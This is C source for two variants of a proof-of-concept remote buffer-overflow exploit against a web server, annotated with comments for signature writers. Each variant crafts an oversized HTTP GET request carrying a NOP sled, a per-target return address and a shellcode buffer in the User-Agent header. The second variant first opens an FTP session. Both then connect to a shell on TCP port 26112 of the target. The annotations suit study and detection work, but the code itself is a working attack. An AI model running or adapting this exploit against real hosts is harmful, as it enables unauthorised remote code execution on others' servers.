/*
 * Entry point of a proof-of-concept client: parses the command line, builds
 * one oversized HTTP GET request, sends it to the chosen host/port, and then
 * calls getshell() against TCP port 26112 on the same host.
 *
 * Options (getopt string "T:t:H:h:P:p:IiXx"):
 *   -t/-T N     index into __pl_form; selects the return address
 *   -h/-H HOST  target host (required; the D_HOST default triggers usage)
 *   -p/-P PORT  target port (default D_PORT)
 *   -i/-I       print a hint and exit(-1)
 *   X/x are accepted by the option string but have no case in the switch.
 *
 * Traffic shape visible in this block, useful when writing signatures:
 *   - request line "GET <filler> /HTTP/1.0", where the filler is a run of
 *     0x90 bytes ending in the raw bytes of retaddr;
 *   - a User-Agent header that starts with 88 bytes of 0x90 followed by the
 *     contents of `shell`;
 *   - a follow-up getshell(hostname, 26112) call one second later.
 *
 * D_PORT, D_HOST, BUFSIZE, BUFSIZE2, BUFSIZE3, __pl_form, shell, banrl,
 * x_fp_rm_usage, sock_connect and getshell are defined outside this block.
 *
 * Does not return normally: every path ends in exit().
 */
int main(int argc,char *argv[])
{
    int port=D_PORT;
    char hostname[0x333]=D_HOST;
    int whlp,type=0;
    unsigned int i=0;                 /* unused in this function */
    char buf[BUFSIZE+1];              /* request-line filler */
    char buf2[BUFSIZE2+1];            /* User-Agent value */
    char sendbuf[BUFSIZE3+1];         /* full HTTP request */
    int sd;
    /* Default return address: entry 0 of the per-target table. */
    u_long retaddr=__pl_form[type].retaddr;

    (void)banrl();

    while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF)
    {
        extern char *optarg;
        switch(whlp)
        {
            case 'T':
            case 't':
                /* NOTE(review): only the upper bound is checked; atoi() can
                 * return a negative value, which would still be used as an
                 * index into __pl_form. */
                if((type=atoi(optarg))<6)
                {
                    retaddr=__pl_form[type].retaddr;
                }
                else (void)x_fp_rm_usage(argv[0]);
                break;
            case 'H':
            case 'h':
                /* Zero first and copy at most size-1 bytes, so hostname
                 * stays NUL-terminated. */
                memset((char *)hostname,0,sizeof(hostname));
                strncpy(hostname,optarg,sizeof(hostname)-1);
                break;
            case 'P':
            case 'p':
                /* atoi(): no error reporting or range check on the port. */
                port=atoi(optarg);
                break;
            case 'I':
            case 'i':
                fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
                exit(-1);
            case '?':
                (void)x_fp_rm_usage(argv[0]);
                break;
        }
    }

    /* Host left at its default means no target was given. */
    if(!strcmp(hostname,D_HOST))
    {
        (void)x_fp_rm_usage(argv[0]);
    }
    /* Bare block, not an else branch: it runs whenever control reaches it.
     * presumably x_fp_rm_usage() exits - confirm against its definition. */
    {
        fprintf(stdout," [+] Hostname: %s\n",hostname);
        fprintf(stdout," [+] Port num: %d\n",port);
        /* NOTE(review): retaddr is u_long but is printed with %p. */
        fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
    }

    fprintf(stdout," [1] #1 Set codes.\n");
    /* Filler of 0x90 bytes (the x86 NOP opcode; the target architecture is
     * not stated in this block) with retaddr copied over its last
     * sizeof(retaddr) bytes. A fixed, table-driven address presumably relies
     * on a predictable memory layout in the server; ASLR, stack canaries and
     * a non-executable stack are the usual hardening against that class. */
    memset(buf, 0x90, BUFSIZE);
    memcpy(&buf[BUFSIZE-(sizeof(retaddr))], &retaddr, sizeof(retaddr));
    /* 88 bytes of 0x90, then sizeof(shell) bytes of `shell`
     * (presumably the payload; defined elsewhere). */
    memset(buf2,0x90,88);
    memcpy(buf2+88,shell, sizeof(shell));
    /* Output is capped at 1024 bytes. Note the malformed request line: the
     * filler is the URI and is followed by " /HTTP/1.0". */
    snprintf(sendbuf,1024,"GET %s /HTTP/1.0\r\nUser-Agent: %s\r\n\r\n",buf,buf2);

    fprintf(stdout," [1] #1 Set socket.\n");
    /* Return value is not checked before use. */
    sd=sock_connect(hostname,port);

    fprintf(stdout," [1] #1 Send codes.\n");
    /* Sends a fixed BUFSIZE3 bytes rather than the formatted length; sendbuf
     * is not initialised, so any bytes past the formatted request are
     * whatever was on the stack. */
    write(sd,sendbuf,BUFSIZE3);
    close(sd);
    sleep(1);

    fprintf(stdout," [1] #3 Get shell.\n");
    /* presumably connects to TCP 26112 on the target, which would mean the
     * payload opens a listener there - confirm in getshell(). A new listener
     * or inbound session on that port on a web server is the post-request
     * indicator to look for. */
    getshell(hostname,26112);
    exit(0);
}
/*
 * Entry point of a second proof-of-concept variant: opens an FTP control
 * connection to the host first, then sends one oversized HTTP GET request
 * and calls getshell() against TCP port 26112 on the same host.
 *
 * Options (getopt string "T:t:H:h:u:c:a:P:p:IiXx"):
 *   -t/-T N     index into __pl_form; selects retaddr
 *   -h/-H HOST  target host (required; the D_HOST default triggers usage)
 *   -u / -a / -c  stored in the globals user / pass / writedir
 *               (presumably consumed by ftp_parse(); confirm there)
 *   -p/-P PORT  target HTTP port (default D_PORT)
 *   -i/-I       print a hint and exit(-1)
 *   X/x are accepted by the option string but have no case in the switch.
 *
 * Traffic shape visible in this block, useful when writing signatures:
 *   - a TCP connection to port 21 on the host, handled by ftp_parse();
 *   - request line "GET /<seg>/<seg>/.../ HTTP/1.0" with seven path
 *     segments, each formatted from a buffer of 141 bytes of 0x42 ('B');
 *   - a User-Agent header of 1000 bytes of 0x90, the contents of `shell`,
 *     then 1000 more bytes of 0x90;
 *   - a follow-up getshell(hostname, 26112) call ten seconds later.
 *
 * D_PORT, D_HOST, __pl_form, shell, user, pass, writedir, banrl, printe,
 * x_fp_rm_usage, sock_connect, ftp_parse and getshell are defined outside
 * this block.
 *
 * Does not return normally: every path ends in exit().
 */
int main(int argc,char *argv[])
{
    int port=D_PORT;
    char hostname[0x333]=D_HOST;
    int whlp,type=0;
    unsigned int i=0;                 /* unused in this function */
    char buf[141];                    /* unused in this function */
    char buf2[2078];                  /* User-Agent value */
    char sendbuf[3150];               /* full HTTP request */
    char buf3[141];                   /* one path segment */
    int sd;
    int ftpsd;
    /* In this variant retaddr is only printed; it is never copied into the
     * request buffers below. */
    u_long retaddr=__pl_form[type].retaddr;

    (void)banrl();

    while((whlp=getopt(argc,argv,"T:t:H:h:u:c:a:P:p:IiXx"))!=EOF)
    {
        extern char *optarg;
        switch(whlp)
        {
            case 'T':
            case 't':
                /* NOTE(review): only the upper bound is checked; atoi() can
                 * return a negative value, which would still be used as an
                 * index into __pl_form. */
                if((type=atoi(optarg))<6)
                {
                    retaddr=__pl_form[type].retaddr;
                }
                else (void)x_fp_rm_usage(argv[0]);
                break;
            case 'H':
            case 'h':
                /* Zero first and copy at most size-1 bytes, so hostname
                 * stays NUL-terminated. */
                memset((char *)hostname,0,sizeof(hostname));
                strncpy(hostname,optarg,sizeof(hostname)-1);
                break;
            case 'u':
                /* First occurrence wins: the global is only set while it is
                 * still NULL. Same pattern for 'a' and 'c'. */
                if(!user&&!(user=(char *)strdup(optarg)))
                    printe("main(): allocating memory failed.",1);
                break;
            case 'a':
                if(!pass&&!(pass=(char *)strdup(optarg)))
                    printe("main(): allocating memory failed.",1);
                break;
            case 'c':
                if(!writedir&&!(writedir=(char *)strdup(optarg)))
                    printe("main(): allocating memory failed.",1);
                break;
            case 'P':
            case 'p':
                /* atoi(): no error reporting or range check on the port. */
                port=atoi(optarg);
                break;
            case 'I':
            case 'i':
                fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
                exit(-1);
            case '?':
                (void)x_fp_rm_usage(argv[0]);
                break;
        }
    }

    /* Host left at its default means no target was given. */
    if(!strcmp(hostname,D_HOST))
    {
        (void)x_fp_rm_usage(argv[0]);
    }
    else
    {
        fprintf(stdout," [+] Hostname: %s\n",hostname);
        fprintf(stdout," [+] Port num: %d\n",port);
        /* NOTE(review): retaddr is u_long but is printed with %p. */
        fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
    }

    fprintf(stdout," [1] #1 Set codes.\n");
    /* FTP control connection on the fixed port 21; the return value is not
     * checked and ftpsd is not closed in this function. What ftp_parse()
     * does with the session is not visible here. */
    ftpsd=sock_connect(hostname,21);
    ftp_parse(ftpsd);
    /* Path segment: 141 bytes of 0x42 (ASCII 'B'). */
    memset(buf3,0x42,141);
    /* User-Agent value: 0x90 run, `shell` (length taken with strlen, so it
     * is treated as a C string here), then a second 0x90 run. 0x90 is the
     * x86 NOP opcode; the target architecture is not stated in this block. */
    memset(buf2,0x90,1000);
    memcpy(buf2+1000,shell,strlen(shell));
    memset(buf2+1000+strlen(shell),0x90,1000);
    /* Seven buf3 segments form the URI; output is capped at 3150 bytes. */
    snprintf(sendbuf,3150,"GET /%s/%s/%s/%s/%s/%s/%s/ HTTP/1.0\r\nUser-Agent: %s\r\n\r\n",buf3,buf3,buf3,buf3,buf3,buf3,buf3,buf2);

    fprintf(stdout," [1] #1 Set socket.\n");
    /* Return value is not checked before use. */
    sd=sock_connect(hostname,port);

    fprintf(stdout," [1] #1 Send codes.\n");
    /* Sends the whole 3150-byte buffer regardless of the formatted length. */
    write(sd,sendbuf,3150);
    close(sd);
    sleep(10);

    fprintf(stdout," [1] #3 Get shell.\n");
    /* presumably connects to TCP 26112 on the target, which would mean the
     * payload opens a listener there - confirm in getshell(). An FTP session
     * followed by this request and a session on 26112 from the same source
     * is the sequence to correlate on. */
    getshell(hostname,26112);
    exit(0);
}